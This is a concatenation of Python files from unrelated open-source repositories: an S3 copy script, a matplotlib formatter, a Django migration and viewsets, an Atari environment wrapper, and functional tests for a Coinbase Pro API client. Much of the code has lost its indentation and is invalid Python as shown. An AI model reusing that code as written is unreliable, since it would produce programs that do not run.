# -----------------------------------------------------------------------------
# cfgfiles Config file search path
# -----------------------------------------------------------------------------
cfgfiles = [
"/etc/campanile.cfg",
"./campanile.cfg"
]
# -----------------------------------------------------------------------------
# Functions
# -----------------------------------------------------------------------------
def main():
## Args
parser = argparse.ArgumentParser()
parser.add_argument('--src-bucket', required=True, dest='src',
help='Source S3 bucket')
parser.add_argument('--dst-bucket', required=True, dest='dst',
help='Destination S3 bucket')
parser.add_argument('--src-endpoint',
default=boto.s3.connection.NoHostProvided,
help='S3 source endpoint')
parser.add_argument('--dst-endpoint',
default=boto.s3.connection.NoHostProvided,
help='S3 destination endpoint')
parser.add_argument('--src-profile',
help='Boto profile used for source connection')
parser.add_argument('--dst-profile',
help='Boto profile used for destination connection')
parser.add_argument('--config', '-c', default="./campanile.cfg",
help='Path to config file')
args = parser.parse_args()
## Config Object
cfgfiles = campanile.cfg_file_locations()
cfgfiles.insert(0, args.config)
c = ConfigParser.SafeConfigParser({'ephemeral':'/tmp'})
c.read(cfgfiles)
## S3 Bucket Connections
src_bucket = S3Connection(suppress_consec_slashes=False,\
host=args.src_endpoint,is_secure=True,
profile_name=args.src_profile).\
get_bucket(args.src,validate=False)
dst_bucket = S3Connection(suppress_consec_slashes=False,\
host=args.dst_endpoint,is_secure=True,
profile_name=args.dst_profile).\
get_bucket(args.dst,validate=False)
## Reporting Counters
files = 0
movedbytes = 0
## Select random tmpdir to distribute load across disks
tmpdir = random.choice(c.get('DEFAULT',"ephemeral").split(','))
start_index = campanile.stream_index()
for line in fileinput.input("-"):
name, etag, size, mtime, mid, part, partcount, startbyte, stopbyte \
= line.rstrip('\n').split('\t')[start_index:]
srckey = src_bucket.get_key(name, validate=False)
dstkey = dst_bucket.get_key(name, validate=False)
if mid == campanile.NULL:
headers={}
report_name = name
expected_size = int(size)
else:
headers={'Range' : "bytes=%s-%s" % (startbyte, stopbyte)}
report_name = "%s-%s" % (name, 'part')
expected_size = int(stopbyte) - int(startbyte) + 1
with tempfile.SpooledTemporaryFile(max_size=c.getint('DEFAULT',\
'maxtmpsize'),dir=tmpdir) as fp:
## Download
p = campanile.FileProgress(name, verbose=1)
srckey.get_contents_to_file(fp, headers=headers, cb=p.progress)
if fp.tell() != expected_size:
raise Exception("Something bad happened for %s. \
Expecting %s, but got %s" % \
(report_name, expected_size, fp.tell()))
campanile.counter(args.src, "OutputBytes", size)
            fp.flush()
fp.seek(0)
if mid == campanile.NULL:
dstkey.cache_control= srckey.cache_control
dstkey.content_type = srckey.content_type
dstkey.content_encoding = srckey.content_encoding
dstkey.content_disposition = srckey.content_disposition
dstkey.content_language = srckey.content_language
dstkey.metadata = srckey.metadata
dstkey.md5 = srckey.md5
report_name = name
else:
mp = boto.s3.multipart.MultiPartUpload(bucket=dst_bucket)
mp.id = mid
mp.key_name = name
report_name = "%s-%s" % (name, part)
## Upload
p = campanile.FileProgress(report_name, verbose=1)
if mid == campanile.NULL:
dstkey.set_contents_from_file(fp,
encrypt_key=srckey.encrypted, cb=p.progress)
newetag = dstkey.etag.replace("\"","")
else:
mpart = mp.upload_part_from_file(fp,part_num=int(part),
cb=p.progress)
newetag = mpart.etag.replace("\"","")
if newetag != srckey.md5:
## Add alert
raise Exception("Something bad happened for %s. \
Expecting %s md5, but got %s" % \
(report_name, srckey.md5, newetag))
if mid != campanile.NULL:
print "%s\t%s\t%s\t%s\t%s\t%s\t%s" % \
(name, etag, mid, newetag, part, startbyte, stopbyte)
campanile.counter(args.dst, "InputBytes", expected_size)
campanile.status("%s/%s:OK" % (args.dst,report_name))
# -----------------------------------------------------------------------------
# Main
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
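The range bookkeeping in the loop above is inclusive on both ends: a part covering `startbyte` through `stopbyte` must download exactly `stopbyte - startbyte + 1` bytes, which is what the `expected_size` check enforces. A standalone sketch of that arithmetic (the 5 MiB boundary values are illustrative, not from a real transfer):

```python
# Sketch of the inclusive byte-range size check used above; the sample
# part boundaries are hypothetical.

def expected_part_size(startbyte, stopbyte):
    """HTTP Range headers are inclusive on both ends, hence the +1."""
    return int(stopbyte) - int(startbyte) + 1

def range_header(startbyte, stopbyte):
    """Build the same Range header the copier sends for one part."""
    return {"Range": "bytes=%s-%s" % (startbyte, stopbyte)}

# A part covering the first 5 MiB of an object: bytes 0 through 5242879.
assert expected_part_size(0, 5242879) == 5 * 1024 * 1024
assert range_header(0, 5242879) == {"Range": "bytes=0-5242879"}
```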
# -----------------------------------------------------------------------------
# File: test/test_blog.py (repo: Jn-mic/blog, license: MIT)
# -----------------------------------------------------------------------------
from app.models import User, Post, Comment, Clap
from app import db
import unittest


class BlogTest(unittest.TestCase):
    # def setUp(self):
    #     self.user_Jack = User(username='Jack', password='vila',
    #                           email='jackotienokey@gmail.com')

    def tearDown(self):
        Post.query.delete()
        User.query.delete()
        Comment.query.delete()
        Clap.query.delete()
# -----------------------------------------------------------------------------
# File: src/pytools/viz/util/_matplot.py (repo: BCG-Gamma/pytools, license: Apache-2.0)
# -----------------------------------------------------------------------------
"""
Utilities related to matplotlib.
"""
import logging
from matplotlib.ticker import Formatter
from pytools.api import AllTracker
from pytools.meta import SingletonMeta
log = logging.getLogger(__name__)
#
# Exported names
#
__all__ = ["PercentageFormatter"]
#
# Ensure all symbols introduced below are included in __all__
#
__tracker = AllTracker(globals())
#
# Classes
#
class PercentageFormatter(Formatter, metaclass=SingletonMeta):
"""
    Formats floats as percentages with 3 digits of precision, omitting trailing
    zeros. Percentages at or above 100% are rounded to the nearest whole number.
Formatting examples:
- ``0.00005`` is formatted as ``0.01%``
- ``0.0005`` is formatted as ``0.05%``
- ``0.0`` is formatted as ``0%``
- ``0.1`` is formatted as ``10%``
- ``1.0`` is formatted as ``100%``
- ``0.01555`` is formatted as ``1.56%``
- ``0.1555`` is formatted as ``15.6%``
- ``1.555`` is formatted as ``156%``
- ``15.55`` is formatted as ``1556%``
- ``1555`` is formatted as ``1.6e+05%``
"""
def __call__(self, x, pos=None) -> str:
if x < 1.0:
return f"{x * 100.0:.3g}%"
else:
return f"{round(x * 100.0):.5g}%"
# check consistency of __all__
__tracker.validate()
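The two format specs in `__call__` do the work: `:.3g` keeps three significant digits for values below 100%, while `round()` plus `:.5g` snaps larger values to whole percents. The same expressions can be checked standalone, without matplotlib:

```python
def fmt(x):
    # Same logic as PercentageFormatter.__call__, minus the Formatter base class.
    if x < 1.0:
        return f"{x * 100.0:.3g}%"
    return f"{round(x * 100.0):.5g}%"

# Mirrors the examples in the class docstring above.
assert fmt(0.0005) == "0.05%"
assert fmt(0.0) == "0%"
assert fmt(0.1) == "10%"
assert fmt(1.0) == "100%"
```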
# -----------------------------------------------------------------------------
# File: logs_manager/migrations/0006_auto_20200724_0722.py (repo: adwait-thattey/raygun_api, license: MIT)
# -----------------------------------------------------------------------------
# Generated by Django 2.1.5 on 2020-07-24 07:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('logs_manager', '0005_auto_20200724_0647'),
]
operations = [
migrations.RemoveField(
model_name='analyticlog',
name='logobject_ptr',
),
migrations.AlterModelOptions(
name='userinteraction',
options={'ordering': ('log_id', 'timestamp')},
),
migrations.RenameField(
model_name='userinteraction',
old_name='analytic_log',
new_name='log_id',
),
migrations.DeleteModel(
name='AnalyticLog',
),
]
# -----------------------------------------------------------------------------
# File: test/test_json.py (repo: Zhu-Jianwei/LaTeX-helper, license: MIT)
# -----------------------------------------------------------------------------
import json
json_data = r'''
{
"Print to console": {
"prefix": "log",
"body": [
"console.log('$1');",
"$2"
],
"description": "Log output to console"
},
"hello": {
"prefix": "hello",
"body": [
"hello world"
],
"description": "description of hello world."
},
"Basic Blocks": {
"prefix": "bb",
"body": [
"\\b"
],
"description": "null"
}
}
'''
json_dict = json.loads(json_data)
print(json_dict)
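One detail worth noting above: because `json_data` is a raw string, the `"\\b"` in the `Basic Blocks` snippet reaches the JSON parser with both backslashes intact, and JSON then decodes the pair to a single backslash followed by `b`. A small standalone check:

```python
import json

raw = r'{"body": ["\\b"]}'          # raw string: both backslashes are kept
parsed = json.loads(raw)
assert parsed["body"][0] == "\\b"   # JSON '\\' decodes to one backslash
assert len(parsed["body"][0]) == 2  # backslash + 'b'
```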
# -----------------------------------------------------------------------------
# File: atari/atari.py (repo: neevparikh/lwm, license: MIT)
# -----------------------------------------------------------------------------
import torch
from gym.spaces.box import Box
from baselines import bench
from baselines.common.vec_env.shmem_vec_env import ShmemVecEnv
from baselines.common.atari_wrappers import wrap_deepmind, make_atari
from baselines.common.vec_env import VecEnvWrapper
def make_vec_envs(name, num, seed=0, max_ep_len=100000):
def make_env(rank):
def _thunk():
full_name = f"{name}NoFrameskip-v4"
env = make_atari(full_name, max_episode_steps=max_ep_len)
env.seed(seed + rank)
env = bench.Monitor(env, None)
env = wrap_deepmind(env, episode_life=True, clip_rewards=False)
return env
return _thunk
envs = [make_env(i) for i in range(num)]
envs = ShmemVecEnv(envs, context="fork")
envs = VecTorch(envs)
return envs
class VecTorch(VecEnvWrapper):
def __init__(self, env):
super(VecTorch, self).__init__(env)
obs = self.observation_space.shape
self.observation_space = Box(0, 255, [obs[2], obs[0], obs[1]],
dtype=self.observation_space.dtype)
def _convert_obs(self, x):
return torch.from_numpy(x).permute(0, 3, 1, 2)
def reset(self):
return self._convert_obs(self.venv.reset())
def step_async(self, actions):
assert len(actions.shape) == 2
actions = actions[:, 0].cpu().numpy()
self.venv.step_async(actions)
def step_wait(self):
obs, reward, done, info = self.venv.step_wait()
obs = self._convert_obs(obs)
reward = torch.from_numpy(reward)[..., None].float()
done = torch.tensor(done, dtype=torch.uint8)[..., None]
return obs, reward, done, info
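`VecTorch._convert_obs` permutes observations from NHWC to NCHW with `permute(0, 3, 1, 2)`, and the constructor rebuilds the `Box` space shape to match. The shape bookkeeping alone, framework-free (the 84x84x4 frame stack is illustrative):

```python
def hwc_to_chw_shape(shape):
    # Mirrors the Box(...) reshape above: (H, W, C) -> (C, H, W)
    h, w, c = shape
    return (c, h, w)

# A typical deepmind-wrapped Atari observation: 84x84 pixels, 4 stacked frames.
assert hwc_to_chw_shape((84, 84, 4)) == (4, 84, 84)
```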
# -----------------------------------------------------------------------------
# File: 05/scrum/board/views.py (repo: mezklador/lightweight-django, license: MIT)
# -----------------------------------------------------------------------------
from django.contrib.auth import get_user_model
from rest_framework import authentication, permissions, viewsets, filters
from .forms import TaskFilter, SprintFilter
from .models import Sprint, Task
from .serializers import SprintSerializer, TaskSerializer, UserSerializer
User = get_user_model()
class DefaultsMixin(object):
"""Default settings for view authentication, permissions, filtering and
pagination"""
authentication_classes = (
authentication.BasicAuthentication,
authentication.TokenAuthentication,
)
permission_classes = (
permissions.IsAuthenticated,
)
paginate_by = 25
paginate_by_param = 'page_size'
max_paginate_by = 100
filter_backends = (
filters.DjangoFilterBackend,
filters.SearchFilter,
filters.OrderingFilter,
)
class SprintViewSet(DefaultsMixin, viewsets.ModelViewSet):
"""API endpoint for listing and creating sprints."""
queryset = Sprint.objects.order_by('end')
serializer_class = SprintSerializer
filter_class = SprintFilter
search_fields = ('name',)
ordering_fields = ('end', 'name',)
class TaskViewSet(DefaultsMixin, viewsets.ModelViewSet):
"""API endpoint for listing and creating tasks."""
queryset = Task.objects.all()
serializer_class = TaskSerializer
search_fields = ('name', 'description',)
ordering_fields = ('name', 'order', 'started', 'due', 'completed',)
class UserViewSet(DefaultsMixin, viewsets.ReadOnlyModelViewSet):
"""Api endpoint for listing users."""
lookup_field = User.USERNAME_FIELD
lookup_url_kwarg = User.USERNAME_FIELD
queryset = User.objects.order_by(User.USERNAME_FIELD)
serializer_class = UserSerializer
search_fields = (User.USERNAME_FIELD,)
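`DefaultsMixin` relies only on Python attribute lookup order: each viewset lists the mixin before the DRF base class, so the mixin's class attributes shadow the framework defaults, while a viewset can still override them locally. A minimal stdlib sketch of the same pattern (class names here are made up):

```python
class Base:
    paginate_by = 10        # stands in for a framework default

class Defaults:
    paginate_by = 25        # shared override, like DefaultsMixin above

class SprintView(Defaults, Base):
    pass                    # inherits the mixin's value via the MRO

class TaskView(Defaults, Base):
    paginate_by = 50        # a view can still override the mixin

assert SprintView.paginate_by == 25
assert TaskView.paginate_by == 50
```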
# -----------------------------------------------------------------------------
# File: tests/functional/rest/test_client.py (repo: terrorizer1980/copra, license: MIT)
# -----------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Functional tests for `copra.rest.Client` class.
Without any additional user input, this module will test all of the
unauthenticated methods of the copra.rest.Client.
An API key for the Coinbase Pro sandbox is required to test the authenticated
methods. The key information as well as the ids of a few test accounts are
read in to this module as environment variables by the dotenv module from a
file named .env. The .env file must reside in the same directory as this test
module.
An example .env file named .env.sample is provided. To test the authenticated
methods, fill out the .env.sample file accordingly and rename it to .env.
"""
import os.path
if os.path.isfile(os.path.join(os.path.dirname(__file__), '.env')):
from dotenv import load_dotenv
load_dotenv()
else:
print("\n** .env file not found. Authenticated methods will be skipped. **\n")
import asyncio
from datetime import datetime, timedelta
import os
import json
import random
import time
from uuid import uuid4
from asynctest import TestCase, skipUnless, expectedFailure
from dateutil import parser
from copra.rest import APIRequestError, Client, SANDBOX_URL
from copra.rest.client import USER_AGENT
KEY = os.getenv('KEY')
SECRET = os.getenv('SECRET')
PASSPHRASE = os.getenv('PASSPHRASE')
TEST_AUTH = True if (KEY and SECRET and PASSPHRASE) else False
TEST_BTC_ACCOUNT = os.getenv('TEST_BTC_ACCOUNT')
TEST_USD_ACCOUNT = os.getenv('TEST_USD_ACCOUNT')
TEST_USD_PAYMENT_METHOD = os.getenv('TEST_USD_PAYMENT_METHOD')
TEST_USD_COINBASE_ACCOUNT = os.getenv('TEST_USD_COINBASE_ACCOUNT')
HTTPBIN = 'http://httpbin.org'
class TestRest(TestCase):
"""Tests for copra.rest.Client"""
def setUp(self):
self.client = Client(self.loop)
if TEST_AUTH:
self.auth_client = Client(self.loop, SANDBOX_URL, auth=True,
key=KEY, secret=SECRET,
passphrase=PASSPHRASE)
def tearDown(self):
self.loop.create_task(self.client.close())
if TEST_AUTH:
self.loop.run_until_complete(self.auth_client.cancel_all(stop=True))
self.loop.create_task(self.auth_client.close())
# try to avoid public rate limit, allow for aiohttp cleanup and
# all outstanding Coinbase actions to complete
self.loop.run_until_complete(asyncio.sleep(1))
async def test_user_agent(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.get('/user-agent')
self.assertEqual(body['user-agent'], USER_AGENT)
async def test__handle_error(self):
async with Client(self.loop, HTTPBIN) as client:
with self.assertRaises(APIRequestError) as cm:
headers, body = await client.get('/status/404')
async def test_delete(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.delete('/delete')
self.assertEqual(body['args'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
params = {'key1': 'item1', 'key2': 'item2'}
headers, body = await client.delete('/delete', params=params)
self.assertEqual(body['args'], params)
async def test_get(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.get('/get')
body['args'].pop('no-cache', None)
self.assertEqual(body['args'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
params = {'key1': 'item1', 'key2': 'item2'}
headers, body = await client.get('/get', params=params)
self.assertEqual(body['args'], params)
async def test_post(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.post('/post')
self.assertEqual(body['form'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
data = {"key1": "item1", "key2": "item2"}
headers, body = await client.post('/post', data=data)
self.assertEqual(json.loads(body['data']), data)
async def test_products(self):
keys = {'id', 'base_currency', 'quote_currency', 'base_min_size',
'base_max_size', 'quote_increment', 'display_name', 'status',
'margin_enabled', 'status_message', 'min_market_funds',
'max_market_funds', 'post_only', 'limit_only', 'cancel_only'}
# Sometimes returns 'accesible' as a key. ??
products = await self.client.products()
self.assertIsInstance(products, list)
self.assertGreater(len(products), 1)
self.assertIsInstance(products[0], dict)
self.assertGreaterEqual(len(products[0]), len(keys))
self.assertGreaterEqual(products[0].keys(), keys)
async def test_order_book(self):
keys = {'sequence', 'bids', 'asks'}
ob1 = await self.client.order_book('BTC-USD', level=1)
self.assertIsInstance(ob1, dict)
self.assertEqual(ob1.keys(), keys)
self.assertIsInstance(ob1['bids'], list)
self.assertEqual(len(ob1['bids']), 1)
self.assertEqual(len(ob1['bids'][0]), 3)
self.assertIsInstance(ob1['asks'], list)
self.assertEqual(len(ob1['asks']), 1)
self.assertEqual(len(ob1['asks'][0]), 3)
ob2 = await self.client.order_book('BTC-USD', level=2)
self.assertIsInstance(ob2, dict)
self.assertEqual(ob2.keys(), keys)
self.assertIsInstance(ob2['bids'], list)
self.assertEqual(len(ob2['bids']), 50)
self.assertEqual(len(ob2['bids'][0]), 3)
self.assertIsInstance(ob2['asks'], list)
self.assertEqual(len(ob2['asks']), 50)
self.assertEqual(len(ob2['asks'][0]), 3)
ob3 = await self.client.order_book('BTC-USD', level=3)
self.assertIsInstance(ob3, dict)
self.assertEqual(ob3.keys(), keys)
self.assertIsInstance(ob3['bids'], list)
self.assertGreater(len(ob3['bids']), 50)
self.assertEqual(len(ob3['bids'][0]), 3)
self.assertIsInstance(ob3['asks'], list)
self.assertGreater(len(ob3['asks']), 50)
self.assertEqual(len(ob3['asks'][0]), 3)
async def test_ticker(self):
keys = {'trade_id', 'price', 'size', 'bid', 'ask', 'volume', 'time'}
tick = await self.client.ticker('BTC-USD')
self.assertIsInstance(tick, dict)
self.assertEqual(tick.keys(), keys)
async def test_trades(self):
keys = {'time', 'trade_id', 'price', 'size', 'side'}
trades, before, after = await self.client.trades('BTC-USD')
self.assertIsInstance(trades, list)
self.assertIsInstance(trades[0], dict)
self.assertIsInstance(before, str)
self.assertIsInstance(after, str)
self.assertEqual(len(trades), 100)
self.assertEqual(trades[0].keys(), keys)
trades, before, after = await self.client.trades('BTC-USD', 5)
self.assertEqual(len(trades), 5)
trades_after, after_after, before_after = await self.client.trades('BTC-USD', 5, after=after)
self.assertLess(trades_after[0]['trade_id'], trades[-1]['trade_id'])
trades_before, after_before, before_before = await self.client.trades('BTC-USD', 5, before=before)
if trades_before:
self.assertGreater(trades_before[-1]['trade_id'], trades[0]['trade_id'])
else:
self.assertIsNone(after_before)
self.assertIsInstance(after_after, str)
await asyncio.sleep(20)
trades_before, after_before, before_before = await self.client.trades('BTC-USD', 5, before=before)
        if trades_before:
self.assertGreater(trades_before[-1]['trade_id'], trades[0]['trade_id'])
else:
self.assertIsNone(after_before)
self.assertIsInstance(after_after, str)
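The `before`/`after` arguments exercised here (and again in `test_account_history` and `test_holds`) follow Coinbase Pro's cursor pagination: results come newest-first, and `after` pages toward older entries. A toy model of that flow (real cursors are opaque strings; plain trade ids stand in for them, and the helper is illustrative, not part of copra):

```python
def page(ids, limit, after=None):
    # ids are newest-first; 'after' selects strictly older entries.
    rows = [i for i in ids if after is None or i < after]
    window = rows[:limit]
    new_after = window[-1] if window else None  # cursor for the next (older) page
    return window, new_after

ids = [9, 8, 7, 6, 5, 4, 3]
first, after = page(ids, 3)
assert first == [9, 8, 7] and after == 7
older, _ = page(ids, 3, after=after)
assert older == [6, 5, 4]
assert older[0] < first[-1]  # mirrors the assertLess on trade_id above
```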
async def test_historic_rates(self):
rates = await self.client.historic_rates('BTC-USD', 900)
self.assertIsInstance(rates, list)
self.assertEqual(len(rates[0]), 6)
self.assertEqual(rates[0][0] - rates[1][0], 900)
end = datetime.utcnow()
start = end - timedelta(days=1)
rates = await self.client.historic_rates('LTC-USD', 3600, start.isoformat(), end.isoformat())
self.assertIsInstance(rates, list)
self.assertEqual(len(rates), 24)
self.assertEqual(len(rates[0]), 6)
self.assertEqual(rates[0][0] - rates[1][0], 3600)
async def test_get_24hour_stats(self):
keys = {'open', 'high', 'low', 'volume', 'last', 'volume_30day'}
stats = await self.client.get_24hour_stats('BTC-USD')
self.assertIsInstance(stats, dict)
self.assertEqual(stats.keys(), keys)
async def test_currencies(self):
keys = {'id', 'name', 'min_size', 'status', 'message', 'details'}
currencies = await self.client.currencies()
self.assertIsInstance(currencies, list)
self.assertGreater(len(currencies), 1)
self.assertIsInstance(currencies[0], dict)
self.assertEqual(currencies[0].keys(), keys)
async def test_server_time(self):
time = await self.client.server_time()
self.assertIsInstance(time, dict)
self.assertIn('iso', time)
self.assertIn('epoch', time)
self.assertIsInstance(time['iso'], str)
self.assertIsInstance(time['epoch'], float)
@skipUnless(TEST_AUTH, "Authentication credentials not provided.")
async def test_accounts(self):
keys = {'id', 'currency', 'balance', 'available', 'hold', 'profile_id'}
accounts = await self.auth_client.accounts()
self.assertIsInstance(accounts, list)
self.assertIsInstance(accounts[0], dict)
self.assertGreaterEqual(accounts[0].keys(), keys)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_account(self):
keys = {'id', 'currency', 'balance', 'available', 'hold', 'profile_id'}
account = await self.auth_client.account(TEST_BTC_ACCOUNT)
self.assertIsInstance(account, dict)
self.assertEqual(account.keys(), keys)
self.assertEqual(account['id'], TEST_BTC_ACCOUNT)
self.assertEqual(account['currency'], 'BTC')
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_account_history(self):
# Assumes market_order works.
orders = []
for i in range(1,6):
size = 0.001 * i
order = await self.auth_client.market_order('buy', 'BTC-USD', size)
orders.append(order)
await asyncio.sleep(0.25)
history, before, after = await self.auth_client.account_history(
TEST_BTC_ACCOUNT, limit=3)
keys = {'amount', 'balance', 'created_at', 'details', 'id', 'type'}
self.assertIsInstance(history, list)
self.assertEqual(len(history), 3)
self.assertEqual(history[0].keys(), keys)
self.assertEqual(history[0]['type'], 'match')
self.assertEqual(history[0]['details']['order_id'], orders[4]['id'])
self.assertEqual(history[0]['details']['product_id'], 'BTC-USD')
after_history, after_before, after_after = await self.auth_client.account_history(TEST_BTC_ACCOUNT, after=after)
self.assertGreater(history[-1]['id'], after_history[0]['id'])
original_history, _, _ = await self.auth_client.account_history(TEST_BTC_ACCOUNT, before=after_before)
self.assertEqual(original_history, history)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_holds(self):
# Assumes cancel, cancel_all and limit_order work
await self.auth_client.cancel_all(stop=True)
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
offset = len(holds)
orders = []
for i in range(1, 8):
size = .001 * i
price = 10000 + i * 1000
order = await self.auth_client.limit_order('sell', 'BTC-USD', price, size)
orders.append(order)
await asyncio.sleep(.25)
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
keys = {'amount', 'created_at', 'id', 'ref', 'type'}
self.assertEqual(len(holds), 7 + offset)
self.assertEqual(holds[0].keys(), keys)
self.assertEqual(float(holds[0]['amount']), .007)
self.assertEqual(orders[6]['id'], holds[0]['ref'])
holds, before, after = await self.auth_client.holds(TEST_BTC_ACCOUNT,
limit=5)
self.assertEqual(len(holds), 5)
after_holds, after_before, after_after = await self.auth_client.holds(
TEST_BTC_ACCOUNT, after=after)
self.assertEqual(len(after_holds), 2 + offset)
original_holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT,
before=after_before, limit=5)
self.assertEqual(original_holds, holds)
for order in orders[4:]:
resp = await self.auth_client.cancel(order['id'])
self.assertEqual(resp[0], order['id'])
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
total = 0
for hold in holds:
if hold['type'] == 'order':
total += float(hold['amount'])
self.assertAlmostEqual(total, 0.01)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_limit_order(self):
# Assumes cancel works
for side, base_price in (('buy', 1), ('sell', 50000)):
# default time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size)
await self.auth_client.cancel(order['id'])
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
# client_oid, explicit time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
client_oid = str(uuid4())
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='GTC',
client_oid=client_oid)
await self.auth_client.cancel(order['id'])
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
# IOC time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='IOC')
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'IOC')
# FOK time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='FOK')
if 'reject_reason' in order:
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'reject_reason',
'settled', 'side', 'size', 'status', 'time_in_force',
'type'}
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'FOK')
# GTT time_in_force, iterate cancel_after
for ca_str, ca_int in [('min', 60), ('hour', 3600), ('day', 86400)]:
o_time = await self.client.server_time()
o_time = float(o_time['epoch'])
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='GTT',
cancel_after=ca_str)
await self.auth_client.cancel(order['id'])
keys = {'created_at', 'executed_value', 'expire_time', 'fill_fees',
'filled_size', 'id', 'post_only', 'price', 'product_id', 'settled',
'side', 'size', 'status', 'stp', 'time_in_force', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTT')
e_time = parser.parse(order['expire_time']).timestamp()
self.assertLessEqual(e_time - o_time - ca_int, 1.0)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_limit_order_stop(self):
# Assumes cancel works
#stop loss
order = await self.auth_client.limit_order('sell', 'BTC-USD', 2.1, .001,
stop='loss', stop_price=2.5)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type', 'stop',
'stop_price'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), 2.1)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'sell')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
self.assertEqual(order['stop'], 'loss')
self.assertEqual(float(order['stop_price']), 2.5)
#stop entry
order = await self.auth_client.limit_order('buy', 'BTC-USD', 9000, .001,
stop='entry', stop_price=9550)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type', 'stop',
'stop_price'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), 9000)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'buy')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
self.assertEqual(order['stop'], 'entry')
self.assertEqual(float(order['stop_price']), 9550)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_market_order(self):
# Assumes cancel works
for side in ('buy', 'sell'):
# Size
size = random.randint(1, 10) / 1000
order = await self.auth_client.market_order(side, 'BTC-USD', size=size)
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'type'}
if side == 'sell':
keys.remove('funds')
self.assertEqual(order.keys(), keys)
